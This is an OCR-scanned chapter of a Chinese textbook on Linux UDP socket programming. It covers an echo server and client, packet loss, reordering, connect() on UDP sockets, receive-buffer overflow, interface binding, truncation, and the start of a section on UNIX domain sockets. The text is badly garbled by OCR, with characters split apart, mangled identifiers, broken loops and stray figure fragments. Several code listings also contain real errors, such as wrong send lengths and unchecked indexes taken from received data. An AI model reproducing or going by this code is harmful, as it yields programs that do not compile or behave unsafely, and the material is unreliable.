UDP 客户 端 UDP 服务 器 


上 
recvfrom 


sendto 


“UDP TEST” 


图 10.8 简单 的 UDP 客户 端 服务 器 
10.3.1 UDP 服务 器 端 
UDP 的 服务 器 端 与 TCP 服务 器 端 十 分 相似 ， 不 过 流程 要 简单 得 多 。 服 务 器 的 代码 如 
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下 ， 其 步骤 为 : 
(1) 建立 一 个 套 接 字 文 件 描述 符 s。 
(2) 填充 地 址 结构 addr_serv, 协议 为 AF_INET, 地 址 为 任意 地 址 , 端口 为 PORT_SERV 


(8888)。 


(3) 将 套 接 字 文件 描述 符 s 绑 定 到 地 址 addr_serv。 


(4) 调 


01 
02 
03 


j udpserv_echo() 函 数 处 理 客户 端 数 据 。 


#include <sys/types.h> 


#include <sys/socket.h> /* 包 含 socket () /bind()*/ 
#include <netinet/in.h> /* 包 含 struct sockaddr in*/ 
#include <string.h> /* 包 含 memset ()*/ 

#define PORT SERV 8888 /* 服 务 器 端口 */ 


int mainl(int argc, char*argv[]) 


上 


dn /* 套 接 字 文 件 描述 符 */ 
struct sockaddr in addr serv,addr clie; /* 地 址 结构 */ 


s = socket (AF INET, SOCK DGRAM, 0); /+ 建立 数据 报 套 接 字 */ 


memset (&addr serv, 0, sizeof(addr serv)); /* 清 空地 址 结构 */ 


addr serv.sin family = AF _INET; /* 地 址 类 型 为 AF_INET*/ 
addr_serv.sin addr.s_addr = htonl (INADDR_ANY); /* 任 意 本 地 地 址 */ 
addr serv.sin port = htons (PORT SERV); /* 服 务 器 端口 */ 


bind(s， (struct sockaddr*) &gaddr serv, sizeof(addr serv)); 
/* 绑 定 地 址 */ 
udpserv_echo(s，(struct sockaddr*) &addr_clie) ; /#* 回 显 处 理 程序 */ 


return 0; 


10.3.2 UDP 服务 器 端 数据 处 理 
函数 udpserv_echo() 的 代码 如 下 , 其 中 的 处 理 过 程 很 简单 ,服务 器 循环 等 待 客户 端的 数 


据 
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{ 


当 服 务 器 接收 到 客户 端的 数据 后 ， 将 接收 到 的 数据 发 回 给 客户 端 。 


#define BUFF LEN 256 /* 缓 冲 区 大 小 */ 

void static udpserv echol(int s, struct sockaddr*client) 
int ns /* 接 收 数据 长 度 */ 
char buff[BUFF LEN]; /* 接 收发 送 缓冲 区 */ 
socklen t len; /* 地 址 长 度 */ 
while(1) /* 循 环 等 待 */ 


{ 

len = sizeof (*client); 

n = recvfrom(s, buff, BUFF LEN, 0, client, &len); 
/* 接 收 数据 放 到 buff 中 ,并 获得 客户 端 地 址 */ 

sendtol(s, buff, n, 0, client, len); 


/* 将 接收 到 的 n 个 字 节 发 送 回 客户 端 */ 
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10.3.3 UDP 客户 端 


UDP 客户 端 向 服务 器 端 发 送 数据 UDP TEST， 然 后 接收 服务 器 端的 回复 信息 ， 并 将 服 
务 器 端的 数据 打印 出 来 。 客 户 端的 代码 如 下 ， 其 步骤 为 : 

(1) 建立 一 个 套 接 字 文 件 描述 符 s。 

(2) 填充 地 址 结构 addr_serv, 协议 为 AF_INET, 地 址 为 任意 地 址 , 端口 为 PORT_SERV 


(8888)。 


(3) 将 套 接 字 文件 描述 符 s 绑 定 到 地 址 addr_serv。 
(4) 调用 udpclie_echo0) 函 数 和 服务 器 通信 。 


01 
02 
03 
04 
05 
06 
07 
08 
09 
10 
下 


#include <sys/types .h> 
#include <stdio.h> 
#include <unistd.h> 


#include <sys/socket.h> /* 包 含 socket () /bind()*/ 
#include <netinet/in.h> /* 包 含 struct sockaddr in*/ 
#include <string.h> /* 包 含 memset ()*/ 
#define PORT SERV 8888 /* 服 务 器 端口 */ 
int main(int argc, char*argv[]) 
{ 
ine /* 套 接 字 文件 描述 符 */ 
struct sockaddr in addr serv; /* 地 址 结构 */ 
s = socket (AF INET, SOCK DGRAM, 0); /* 建 立 数 据 报 套 接 字 */ 


memset (&addr serv, 0, sizeof(addr serv)); /* 清 空地 址 结构 */ 


addr serv.sin family = AF INET; /* 地 址 类 型 为 AF INET*/ 
addr_serv.sin addr.s_addr = htonl (INADDR_ANY) ; /* 任 意 本 地 地 址 */ 
addr serv.sin port = htons (PORT SERV); /* 服 务 器 端口 */ 


udpclie echo(s， (struct sockaddr*) gaddr serv) ; /* 客 户 端 回 显 程序 */ 


close(s); 
return 0; 


10.3.4 UDP 客户 端 数据 处 理 
udpclie_echo() 函 数 的 代码 如 下 ， 其 中 处 理 过 程 同 样 简单 ， 向 服务 器 端 发 送 字符 串 UDP 
TEST， 接 收服 务 器 的 响应 ， 并 将 接收 到 的 服务 器 数据 打印 出 来 。 


#define BUFF LEN 256 /* 缓 冲 区 大 小 */ 
static void udpclie echol(int s, struct sockaddr*to) 


上 
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char buff[BUFF LEN] = "UDP TEST"; /* 发 送 给 服务 器 的 测试 数据 

struct sockaddr in from; /* 服 务 器 地 址 */ 

socklen t len = sizeof(#to) 7 /* 地 址 长 度 */ 

sendto(s, buff, BUFF LEN, 0, to, len); /* 发 送 给 服务 器 */ 

recvfrom(s, buff, BUFF LEN, 0, (struct sockaddr*) gfrom, &len); 
/* 从 服务 器 接收 数据 */ 

printf ("recved:%s\n",buff); /+ 打印 数据 */ 
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Ta 


10.3.5 测试 UDP 程序 
将 服务 器 端的 代码 存 到 udp_server01.c 文件 中 ， 将 客户 端的 代码 存放 到 udp_client01.c 
文件 中 。 按 照 如 下 方式 进行 编译 : 


$gcc -o udp _ server01 udp_server01.c 
$gcc -o udp_client01 udp client0l.c 


先 运行 服务 器 程序 ， 这 时 UDP 服务 器 会 在 8888 端口 等 待 数据 到 来 。 

$ ./udp_server01 

再 运行 客户 端的 程序 ， 客 户 端 向 服务 器 端 发 送 字符 串 UDP TEST， 并 接收 服务 器 的 信 
息 反 馈 。 

$ ./udqp_client01 

则 客户 端的 输出 为 : 


recved:UDP TEST 
10.4 UDP 协议 程序 设计 中 的 几 个 问题 


相对 于 TCP 协议 的 程序 设计 ，UDP 协议 的 程序 虽然 程序 设计 的 环节 要 少 一 些 ， 但 是 
由 于 UDP 协议 缺少 流量 控制 等 机 制 ， 容 易 出 现 一 些 难以 解决 的 问题 。UDP 的 报 文 丢失 、 
报 文 乱 序 、connect() 函 数 、 流 量 控 制 、 外 出 网 络 接口 的 选择 等 是 比较 容易 出 现 的 问题 ， 本 
节 将 对 此 进行 介绍 并 给 出 初步 的 解决 建议 方法 。 


10.4.1 UDP 报 文 丢失 数据 


利用 UDP 协议 进行 数据 收发 的 时 候 ， 在 局 域 网 内 一 般 情况 下 数据 的 接收 方 均 能 接收 
到 发 送 方 的 数据 ， 除 非 连 接 双 方 的 主机 发 生 故 障 ， 否 则 不 会 发 生 接收 不 到 数据 的 情况 。 

1. UDP 报 文 的 正常 发 送 过 程 

而 在 Internet 上 ， 由 于 要 经 过 多 个 路 由 器 ， 正 常情 况 下 一 个 数据 报 文 从 主机 C 经 过 路 
由 器 A、 路 由 器 B、 路 由 器 C 到 达 主 机 S$S， 数 据 报 文 的 路 径 如 图 10.9 所 示 。 主 机 C 使 用 函 


数 sendto() 发 送 数据 , 主机 S 使 用 recvfrom() 函 数 接收 数据 , 主机 S 在 没有 数据 到 来 的 时 候 ， 
会 一 直 阻 塞 等 待 。 


2. UDP 报 文 的 丢失 


路 由 器 要 对 转发 的 数据 进行 存储 、 处 理 、 合 法 性 判定 、 转 发 等 操作 ， 容 易 出 现 错误 ， 
所 以 很 可 能 在 路 由 器 转发 的 过 程 中 出 现 数据 丢失 的 现象 ,如 图 10.10 所 示 。 当 UDP 的 数据 
报 文 丢失 的 时 候 ， 函 数 recvfrom() 会 一 直 阻 塞 ， 直 到 数据 到 来 。 
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主机 C 发 送 数据 主机 S 接收 到 
sendto() 报 文 1 recvfrom() 数据 报 文 1 


数据 报 文 1 


数据 报 文 1 


路 由 器 A 


数据 报 文 1 数据 报 文 1 路 由 器 C 


图 10.9 UDP 数据 在 Intemet 网 发 送 的 正常 情况 


主机 C 发 送 数 主机 S 
sendto() 据 报 文 1 recvfrom() 


数据 报 文 1 | 主机 s 一 直 等 待 主 
| 机 C 的 的 数据 
路 由 器 A 
[丢弃 来 自主 机 
1C 的 数据 报 文 1 路 由 器 C 
数据 报 文 1 
路 由 器 B 


图 10.10 路 由 器 丢弃 发 送 过 程 中 的 UDP 数据 报 文 


在 10.3 节 的 UDP 服务 器 客户 端的 例子 中 ， 如 果 客 户 端 发 送 的 数据 丢失 ， 服 务 器 会 一 
直 等 待 ， 直 到 客户 端 合法 数据 到 来 ， 如 果 服 务 器 的 响应 在 中 间 被 路 由 器 丢弃 ， 则 客户 端 会 
一 直 阻 塞 ， 直 到 服务 器 数据 的 到 来 。 在 程序 正常 运行 的 过 程 中 是 不 允许 出 现 这 种 情况 的 ， 
所 以 可 以 设置 超时 时 间 来 判断 是 否 有 数据 到 来 。 对 于 数据 丢失 的 原因 ， 并 不 能 通过 一 种 简 
单 的 方法 获得 ， 例 如 ， 不 能 区 分 服务 器 发 给 客户 端的 响应 数据 是 在 发 送 的 路 径 中 被 路 由 器 
丢弃 ， 还 是 服务 器 没有 发 送 此 响应 数据 。 
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3. UDP 报 文 丢失 的 对 策 


UDP 协议 中 的 数据 报 文 丢 失 是 先天 性 的 ， 因 为 UDP 是 无 连接 的 、 不 能 保证 发 送 数据 
的 正确 到 达 。 图 10.11 为 TCP 连接 中 发 送 数 据 报 文 的 过 程 , 主机 C 发 送 的 数据 经 过 路 由 器 ， 
到 达 主 机 S 后 , 主机 S 要 发 送 一 个 接收 到 此 数据 报 文 的 响应 , 主机 C 要 对 主机 S 的 响应 进 
行 记录 ， 直 到 之 前 发 送 的 数据 报 文 1 已 经 被 主机 S 接收 到 。 如 果 数 据 报 文 在 经 过 路 由 器 的 
时 候 ， 被 路 由 器 丢弃 ， 则 主机 C 和 主机 S 会 对 超时 的 数据 进行 重 发 。 


主机 C ”| 超时 后 重 发 ee 2 
0 数据 报 文 1 recvfrom() 文 1 
报 文 1 的 响应 
报 文 ! 的 响应 
数据 报 文 ! 
数据 报 文 1 
路 由 器 C 
数据 报 文 1 | 有 
和 -| 路 由 器 B 
Te 报 文 1 的 响应 一 


报 文 的 响应 了 


图 10.11 ”TCP 的 超时 重 发 机 制 


10.4.2 UDP 数据 发 送 中 的 乱 序 


UDP 协议 数据 收发 过 程 中 ， 会 出 现 数据 的 乱 序 现象 。 所 谓 乱 序 是 发 送 数据 的 顺序 和 接 
收 数 据 的 顺序 不 一 致 ， 例 如 发 送 数据 的 顺序 为 数据 包 A、 数 据 包 B、 数 据 包 C， 而 接收 数 
据 包 的 顺序 变 成 了 数据 包 B、 数 据 包 A、 数 据 包 C。 


1. UDP 数据 顺序 收发 的 过 程 


如 图 10.12 所 示 ， 主 机 C 向 主机 $ 发 送 数据 包 0、 数 据 包 1、 数 据 包 2、 数 据 包 3， 各 
个 数据 包 途 中 经 过 路 由 器 A、 路 由 器 B、 路 由 器 C， 先 后 到 达 主 机 S， 在 主机 S 端的 循序 
仍然 为 数据 包 0、 数 据 包 1、 数 据 包 2、 数 据 包 3， 即 发 送 数 据 时 的 顺序 和 接收 数据 时 的 顺 
序 是 一 致 的 。 


2. UDP 数据 的 乱 序 
UDP 的 数据 包 在 网 络 上 传输 的 时 候 ， 有 可 能 造成 数据 的 顺序 更 改 , 接收 方 的 数据 顺序 
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So 


人 -ol [213 


主机 S 
日 四 ee 


路 由 器 A 


路 由 器 B 


图 10.12 ”数据 包 正常 顺序 接收 的 过 程 


和 发 送 方 的 数据 顺序 发 生 了 颠倒 。 这 主要 是 由 于 路 由 的 不 同和 路 由 的 存储 转发 的 顺序 不 同 
造成 的 。 

路 由 器 的 存储 转发 可 能 造成 数据 顺序 的 更 改 ， 如 图 10.13 所 示 。 主 机 C 发 送 的 数据 在 
经 过 路 由 器 A 和 路 由 器 C 的 时 候 ， 顺 序 均 没 有 发 生 更 改 。 而 在 经 过 主机 B 的 时 候 ， 数 据 
的 顺序 由 数据 0123 变 为 了 0312, 这 样 主机 C 的 数据 0123 顺序 经 过 路 由 器 到 达 主 机 S 的 时 
候 变 为 了 数据 0312。 


主机 C 
sendto() 


主机 S 


-of1l213 ol EH recvfrom() 


路 由 器 A 


路 由 器 C 


图 10.13 路 由 器 存储 转发 造成 的 顺序 更 改 


UDP 协议 的 数据 经 过 路 由 器 时 的 路 径 造成 了 发 送 数据 的 混乱 ， 如 图 10.14 所 示 。 从 主 
机 C 发 送 的 数据 0123， 其 中 数据 0 和 3 经 过 路 由 器 B、 路 由 器 C 到 达 主机 S， 数 据 1 和 数 
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据 2 经 过 路 由 器 A 和 路 由 器 C 到达 主机 S, 所 以 数据 由 发 送 时 的 顺序 0123 变 成 了 顺序 1032。 


主机 C of 123 1 o[3 [2 上 -一 主机 S 


sendto() recvfrom() 


图 10.14 路 由 器 路 径 不 同 造成 的 顺序 更 改 


3. UDP 乱 序 的 对 策 
对 于 乱 序 的 解决 方法 可 以 采用 发 送 端 在 数据 段 中 加 入 数据 报 序号 的 方法 ， 这 样 接收 端 


对 接收 到 数据 的 头 端 进行 简单 地 处 理 就 可 以 重新 获得 原始 顺序 的 数据 ， 如 图 10.15 所 示 。 
0|1|2|3 
主机 C [011|2|3 1|013|2L | 主机 S 
sendto() AIBICID BIAIDIC recvfrom() 


1 
B 


己 


器 
阵 
器 
加 
已 
Dw 


路 由 器 C 


路 


DL 


图 10.15 UDP 协议 数据 乱 序 的 解决 示意 图 


10.4.3 UDP 协议 中 的 connect() 函 数 


UDP 协议 的 套 接 字 描 述 符 在 进行 了 数据 收发 之 后 , 才能 确定 套 接 字 描述 符 中 所 表示 的 
发 送 方 或 者 接收 方 的 地 址 ， 否 则 仅 能 确定 本 地 的 地 址 。 例 如 客户 端的 套 接 字 描 述 符 在 发 送 
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数据 之 前 ， 只 要 确定 建立 正确 就 可 以 了 ， 在 发 送 的 时 候 才 确定 发 送 目 的 方 的 地 址 ; 服务 器 
bind() 函 数 也 仅仅 绑 定 了 本 地 进行 接收 的 地 址 和 端口 。 
connect() 函 数 在 TCP 协议 中 会 发 生 三 次 握手 , 建立 一 个 持续 的 连接 , 一般 不 用 于 UDP。 
在 UDP 协议 中 使 用 connectO) 函 数 的 作用 仅仅 表示 确定 了 另 一 方 的 地 址 ， 并 没有 其 他 的 
connect() 函 数 在 UDP 协议 中 使 用 后 会 产生 如 下 的 副作用 : 
口 使 用 connect() 函 数 绑 定 套 接 字 后 ,发 送 操作 不 能 再 使 用 sendto() 函 数 , 要 使 用 write0 
函数 直接 操作 套 接 字 文件 描述 符 ， 不 再 指定 目的 地 址 和 端口 号 。 
口 使 用 connect() 函 数 绑 定 套 接 字 后 ， 接 收 操作 不 能 再 使 用 recvfrom() 函 数 ， 要 使 用 
read() 类 的 函数 ， 函 数 不 会 返回 发 送 方 的 地 址 和 端口 号 。 
口 在 使 用 多 次 connect0) 函 数 的 时 候 ， 会 改变 原来 套 接 字 绑 定 的 目的 地 址 和 端口 号 ， 
用 新 绑 定 的 地 址 和 端口 号 代替 ， 原 有 的 绑 定 状 态 会 失效 。 可 以 使 用 这 种 特点 来 断 
开 原 来 的 连接 。 
下 面 是 一 个 使 用 connect() 函 数 的 例子 ， 在 发 送 数据 之 前 ， 将 套 接 字 文件 描述 符 与 目的 
地 址 使 用 connect(O) 函 数 进行 了 绑 定 ， 之 后 使 用 write() 函 数 发 送 数据 并 使 用 read() 函 数 接收 


01 static void udpclie_echo (int s, struct sockaddr*to) 


D2 

03 char buff[BUFF LEN] = "UDP TEST"; /* 向 服务 器 端 发 送 的 数据 */ 
04 connect(s, to, sizeof(*to)); /* 连 接 */ 

05 

06 n = write(s, buff, BUFF LEN); /* 发 送 数 据 */ 

07 

08 read(s, buff, n); /* 接 收 数据 */ 

oan 


10.4.4 UDP 缺乏 流量 控制 


UDP 协议 没有 TCP 协议 所 具有 的 滑动 窗口 概念 ， 接 收 数 据 的 时 候 直 接 将 数据 放 到 组 
冲 区 中 。 如 果 用 户 没有 及 时 地 从 缓冲 区 中 将 数据 
复制 出 来 , 后 面 到 来 的 数据 会 接着 向 缓冲 区 中 放 
入 。 当 缓冲 区 满 的 时 候 , 后 面 到 来 的 数据 会 履 盖 
之 前 的 数据 而 造成 数据 的 丢失 。 


1. UDP 缺乏 流量 控制 概念 


如 图 10.16 所 示 为 UDP 的 接收 缓冲 区 示意 
图 , 共有 8 个 缓冲 区 ,构成 一 个 环 状 数据 缓 冲 
起 点 为 0。 

当 接收 到 数据 后 , 会 将 数据 顺序 放 入 之 前 数 时 
据 的 后 面 , 并 逐步 递增 缓冲 区 的 序号 , 如 图 10.17 


Ta 
Ns 


当 数 据 没有 接收 或 者 接收 数据 比 发 送 数 据 。 图 10.16 UDP 协议 的 接收 缓冲 


区 | 


6 


Xl 
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的 速率 要 慢 ， 之 前 接收 的 数据 被 覆盖 ， 造 成 数据 的 丢失 ， 如 图 10.18 所 示 。 


号 


7 


多 2 


图 10.17 UDP 协议 的 接收 缓冲 区 接收 过 程 图 10.18 ”UDP 协议 接收 缓冲 区 的 溢出 


2. 缓冲 区 溢出 对 策 


解决 UDP 接收 缓冲 区 溢出 的 现象 需要 根据 实际 情况 确定 ， 一 般 可 以 用 增 大 接收 数据 
缓冲 区 和 接收 方 接收 单独 处 理 的 方法 来 解决 局 部 的 UDP 数据 接收 缓冲 区 溢出 问题 。 

例如 ， 在 局 部 时 间 内 发 送 方 会 爆发 性 地 发 送 大 量 的 数据 ， 在 后 面 的 时 间 ， 发 送 的 数据 
会 较 小 ， 由 于 在 局 部 时 间 内 接收 方 不 能 及 时 处 理 接收 到 的 数据 ， 会 造成 数据 的 丢失 ， 如 果 
增 大 缓冲 区 ， 则 可 以 改善 此 问题 。 如 果 接 收 方 的 接收 能 力 在 绝对 能 力 上 要 小 于 发 送 方 ， 则 
接收 方 由 于 在 处 理 能 力 或 者 容量 方面 的 限制 ， 造 成 数据 肯定 要 丢失 。 

例如 , 对 10.3 节 中 的 代码 进行 如 下 的 修改 , 实现 上 述 的 解决 方法 。 客 户 端的 代码 如 下 ， 
先 将 发 送 计数 的 值 打包 进发 送 缓冲 区 ， 然 后 复制 要 发 送 的 数据 ， 再 进行 数据 发 送 。 每 次 发 
送 的 时 候 ， 计 数 器 增加 1。 


01 #define PORT SERV 8888 /* 服 务 器 端口 */ 

02 #define NUM DATA 100 /+ 接收 缓冲 区 数量 */ 

03 #define LENGTH 1024 /* 单 个 接收 缓冲 区 大 小 */ 
04 static char buff send[LENGTH]; /* 接 收 缓冲 区 */ 

05 static void udpclie echol(int s, struct sockaddr*to) 

06 { 

07 char buff init[BUFF LEN] = "UDP TEST"; /* 向 服务 器 端 发 送 的 数据 */ 
08 struct sockaddr in from; /* 发 送 数 据 的 主机 地 址 */ 
09 int len = sizeof (*to); /* 地 址 长 度 */ 

10 int i = 0; /* 计 数 */ 

i for(i = 0; i< NUM DATA; i++) /* 循 环 发 送 */ 

1 { 

13 *( (int*) gbuff send[0]) = hton]l (i); /* 将 数据 标记 打包 */ 

14 memcpy (&buff send[4],buff init, sizeof (buff init)); 

15 /* 数 据 复制 到 发 送 缓冲 区 */ 
16 sendto(s，&buff send[0]，NUM DATA，0，to，len);  /# 发 送 数据 */ 
Ly } 

30} 
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服务 器 端的 代码 如 下 ， 接 收 到 发 送 方 的 数据 后 ， 判 断 接收 到 数据 的 计数 器 的 值 ， 将 不 
同 计 数 器 的 值 放 入 缓冲 区 不 同 的 位 置 ， 在 使 用 的 时 候 可 以 判断 一 下 计数 器 是 否 正确 ， 即 是 
否 有 数据 到 来 ， 再 进行 使 用 。 


01 
02 


#define PORT SERV 8888 
#define NUM DATA 100 
#define LENGTH 1024 


wd 


static char buff[NUM DATA] [LENGTH]; 


static udpserv echo (int s, struct sockaddr*client) 


int n; 

char tmp buff[LENGTH]; 
int len; 

while (1) 

{ 


len = sizeof (*client); 


/* 服 务 器 端口 */ 
/* 接 收 缓冲 区 数量 */ 
/* 单 个 接收 缓冲 区 大 小 


/* 接 收 缓冲 区 */ 
/* 接 收 数量 */ 
/* 临 时 缓冲 区 */ 
/* 地 址 长 度 */ 
/* 接 收 过 程 */ 
/* 地 址 长 度 */ 


n= recvfrom(s, tmp buff, LENGTH, 0, client, &len); 

/* 接 收 数据 放 到 临时 缓冲 区 中 */ 
/* 根 据 接收 到 数据 的 头 部 标志 , 选择 合适 的 缓冲 区 位 置 复制 数据 */ 
memcpy (&buff [ntohl (*( (int*) gbuff [i] [0]))] [0], tmp buff+4, n-4); 


10.4.5 UDP 协议 中 的 外 出 网 络 接口 


在 网 络 程序 设计 的 时 候 ， 有 时 需要 设置 - 


些 特定 的 条 件 。 例 如 ， 


-个 主机 有 两 个 网 卡 ， 


由 于 不 同 的 网 卡 连接 不 同 的 子 网 ， 用 户 发 送 的 数据 从 其 中 的 一 个 网 卡 发 出 ， 将 数据 发 送 到 
特定 的 子 网 上 。 使 用 函数 connect() 可 以 将 套 接 字 文件 描述 符 与 一 个 网 络 地 址 结构 进行 绑 定 ， 
在 地 址 结构 中 所 设置 的 值 是 发 送 接收 数据 时 套 接 字 采 用 的 IP 地 址 和 端口 。 下 面 的 代码 是 一 


个 例子 : 


01 
02 
03 
04 


#include <sys/types.h> 
#include <sys/socket.h> /*socket ()/bind()*/ 
#include <netinet/in.h> /*struct sockaddr in*/ 


#include <string.h> 


/*memset () */ 


#include <stdio.h> 

#include <arpa/inet.h> 
#include <unistd.h> 

#define PORT_SERV 8888 

int main(int argc, char*argv[]) 


{ 


int s; 

struct sockaddr in addr serv; 
struct sockaddr in local; 
socklen t len = sizeof(local); 


Ss = socket (AF_ INET, SOCK DGRAM, 0); 


/* 填 充 服 务 器 地 址 */ 
memset (&addr serv, 0, sizeof(addr serv)); 
addr serv.sin family = AF INET; 


/* 套 接 字 文 件 描述 符 */ 
/* 服 务 器 地 址 */ 

/* 本 地 地 址 */ 

/* 地 址 长 度 */ 


/* 生 成 数据 报 套 接 字 */ 


/* 清 零 */ 
/*AF_INET 协议 族 */ 
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26 


wh 
28 
29 
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addr serv.sin addr.s addr =inet addr ("127.0.0.1"); 
/x* 地 址 汰 T2750%01*7/ 
addr serv.sin port = htons (PORT SERV); /* 服 务 器 端口 */ 


connect(s, (struct sockaddr*) gaddr serv, sizeof(addr serv)); 
/* 连 接 服 务 器 */ 
getsockname(s, (struct sockaddr*) &local, &len); 
/* 获 得 套 接 字 文 件 描述 符 的 地 址 */ 
printf ("UDP local addr:%s\n",inet ntoal(local.sin addr)); 


/* 打 印 获 得 的 地 址 */ 


close(s); 
return 0; 


编译 并 运行 后 其 结果 如 下 ， 系 统 将 程序 中 的 套 接 字 描述 符 与 本 地 的 回环 接口 进行 了 


绑 定 。 


UDP local addr:127.0.0.1 


10.4.6 UDP 协议 中 的 数据 报 文 截断 


当 使 用 UDP 协议 接收 数据 的 时 候 ， 如 果 应 用 程序 传 入 的 接收 缓冲 区 的 大 小 小 于 到 来 
数据 的 大 小 时 ， 接 收 缓冲 区 会 保存 最 大 可 能 接收 到 的 数据 ， 其 他 的 数据 将 会 丢失 ， 并 且 有 
MSG_TRUNC 的 标志 。 

例如 对 函数 udpclie_echo() 做 如 下 修改 , 发 送 一 个 字符 串 后 在 一 个 循环 中 接收 服务 器 端 
的 响应 ， 会 发 现 只 能 接收 一 个 U， 程 序 阻塞 到 recvfrom() 函 数 中 。 这 是 因为 服务 器 发 送 的 
字符 串 到 达 客 户 端 后 ， 客 户 端的 第 一 次 接收 动作 没有 正确 地 接收 到 全 部 的 数据 ， 其 余 的 数 


据 已 经 丢失 了 。 
01 static void udpclie echol(int s, struct sockaddr*to) 
| | 
03 char buff[BUFF LEN] = "UDP TEST"; /* 要 发 送 的 数据 */ 
04 struct sockaddr in from; /* 发 送 方 的 地 址 结构 */ 
05 int len = sizeof (*to); /# 发 送 的 地 址 结构 长 度 */ 
01 sendto(s, buff, BUFF LEN, 0, to, len); /* 发 送 数 据 */ 
02 To /* 接 收 数据 的 次 数 */ 
03 For(i = O02 J< 6 d+E) 
04 | 
05 memset (buff, 0, BUFF LEN); /* 清 空 缓冲 区 */ 
06 interr= recvfrom(s, buff, 1, 0, (struct sockaddr*) gfrom, &len); 
/* 接 收 数据 */ 
07 printf ("$dst:%c,err:sd\n",i,buff[0],err);  /* 打 印 数 据 */ 
08 1 
09 printf ("recved:%s\n",buff); /* 打 印信 息 */ 
30} 


所 以 服务 器 和 客户 端的 程序 要 进行 配合 ， 接 收 的 缓冲 区 要 比 发 送 的 数据 大 一 些 ， 防 止 
数据 丢失 的 现象 发 生 。 
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10.5 小 结 


本 章 介绍 了 如 何 使 用 UDP 协议 进行 套 接 字 编程 ， 也 介绍 了 UDP 编程 的 程序 框架 ， 客 
户 端 和 服务 器 端 有 不 同 的 流程 。 另外 还 介绍 了 recvfrom() 函 数 和 sendto() 函 数 。 用 一 个 简单 
的 例子 介绍 了 UDP 编程 的 基本 情况 。 

在 使 用 UDP 进行 程序 设计 的 时 候 会 碰 到 很 多 情况 ， 如 接收 端的 数据 淹没 、 数 据 的 乱 
序 、 数 据 报 文 的 接收 端 截 断 、 发 送 网 络 接口 的 绑 定 等 。 相 对 于 TCP 协议， 由 于 不 需要 进行 
流量 控制 、 数 据 应 答 、 状 态 维护 等 特点 ，UDP 的 一 个 显著 优点 是 速度 要 比 TCP 快 得 多 ， 
所 以 很 多 服务 器 端 使 用 UDP 进行 通信 。 而 且 , 有 一 些 协议 是 仅仅 基于 UDP 协议 的 ,如 DNS、 
广播 等 。 
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前 面 几 章 内 容 对 通用 的 UDP、TCP 的 程序 设计 方法 进行 了 介绍 ， 本 章 将 介绍 高 级 套 接 
字 的 编程 ， 包 含 UNIX 域 的 函数 、 广 播 、 多 播 、 数 据 链 路 层 的 程序 设计 等 在 Linux 网 络 程 
序 设计 中 比较 常用 的 方法 ， 主 要 包括 以 下 内 容 。 

口 UNIX 编程 : 介绍 AF_UNIX 协议 族 类 型 , 特别 是 结构 struct sockaddr_un 编程 方法 ; 

口 广播 的 知识 : 介绍 广播 的 概念 、 如 何 进行 广播 的 编程 及 一 个 简单 的 例子 ; 

口 多 播 的 知识 : 介绍 多 播 的 概念 和 多 播 的 地 址 ， 并 介绍 多 播 的 客户 端 和 服务 器 的 编 


程 实例 ; 
口 数据 链 路 层 的 访问 : 介绍 SOCK_PACKET 协议 类 型 ， 如 何 获得 从 数据 链 路 层 到 应 
用 层 的 数据 。 


11.1 UNIX 域 函 数 


UNIX 域 的 协议 族 是 在 同一 台 主 机 上 的 客户 /服务 器 通信 时 使 用 的 一 种 方法 。 相 对 其 他 
方法 〈 例 如 进程 间 通 信 的 管道 ),， 它 在 形式 上 与 传统 套 接 字 API 的 调用 方法 相同 。UNIX 域 
有 两 种 类 型 的 套 接 字 : 字 节 流 套 接 字 和 数据 报 套 接 字 ， 字 节 流 套 接 字 类 似 于 TCP， 数 据 报 
套 接 字 类 似 于 UDP。UNIX 域 的 套 接 字 有 如 下 的 特点 值得 注意 : 

口 UNIX 域 套 接 字 与 TCP 套 接 字 相 比较 ， 在 同一 台 主机 的 传输 速度 前 者 是 后 者 的 

口 UNIX 域 套 接 字 可 以 在 同一 台 主 机 上 各 进程 之 间 传 递 描述 符 。 

口 UNIX 域 套 接 字 与 传统 套 接 字 的 区 别 是 用 路 径 名 来 表示 协议 族 的 描述 。 


11.1.1 UNIX 域 函数 的 地 址 结构 
UNIX 域 的 地 址 结构 在 文件 <sys/un.h> 中 定义 ， 结 构 的 原型 如 下 : 


#define UNIX PATH MAX 108 

struct sockaddr un { 
sa family t sun family; /*AF_UNIX 协议 族 名 称 */ 
char sun path[UNIX PATH MAX]; /# 路 径 名 */ 

by 


口 _ UNIX 域 地 址 结构 成 员 变量 sun_family 的 值 是 AF_UNIX 或 者 AF_LOCAL。 

口 sun_path 是 一 个 路 径 名 ， 此 路 径 名 的 属性 为 0777， 可 以 进行 读 写 等 操作 。 

结构 sockaddr un 的 长 度 使 用 宏 SUN_LEN 定义 ， 默 认 大 小 为 108，SUN_LEN 宏 的 定 
义 如 下 : 
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# define SUN LEN(ptr) ((size t) (((struct sockaddr un*) 0)->sun path) \ 


+ strlen ((ptr)->sun path)) 


11.1.2 ” 套 接 字 函数 


UNIX 域 的 套 接 字 函数 和 以 太 网 套 接 字 (AF_INET) 的 函数 相同 ， 但 是 当 用 于 UNIX 
域 套 接 字 时 ， 套 接 字 函数 有 一 些 差别 和 限制 ， 主 要 有 如 下 几 条 : 


口 


使 用 函数 bind0 进 行 套 接 字 和 地 址 的 绑 定 的 时 候 , 地 址 结构 中 的 路 径 名 和 路 径 名 所 

表示 的 文件 的 默认 访问 权限 为 0777， 即 用 户 、 用 户 所 属 的 组 和 其 他 组 的 用 户 都 能 

读 、 写 和 执行 。 

结构 sum_path 中 的 路 径 名 必须 是 一 个 绝对 路 径 ， 不 能 是 相对 路 径 。 

函数 connect() 使 用 的 路 径 名 必须 是 一 个 绑 定 在 某 个 已 打开 的 UNIX 域 套 接 字 上 的 

路 径 名 ， 而 且 套 接 字 的 类 型 也 必须 一 致 。 下 列 情况 将 出 错 : (a) 该 路 径 名 存在 但 

不 是 一 个 套 接 字 ;，(b) 路 径 名 存在 且 是 一 个 套 接口 ， 但 没有 与 该 路 径 名 相关 联 的 

打开 的 描述 字 ; 《〈c) 路 径 名 存在 且 是 一 个 打开 的 套 接 字 ， 但 类 型 不 符 。 

用 函数 connect() 连 接 UNIX 域 套 接 字 时 的 权限 检查 和 用 函数 open() 以 只 写 方式 访 

问 路 径 名 完全 相同 。 

UNIX 域 字 节 流 套 接 字 和 TCP 套 接 字 类 似 ， 它们 都 为 进程 提供 一 个 没有 记录 边界 

的 字 节 流 接口 。 

如 果 UNIX 域 字 节 流 套 接 字 的 connect(O) 函 数 发 现 监听 套 接 字 的 队列 已 满 ， 会 立刻 

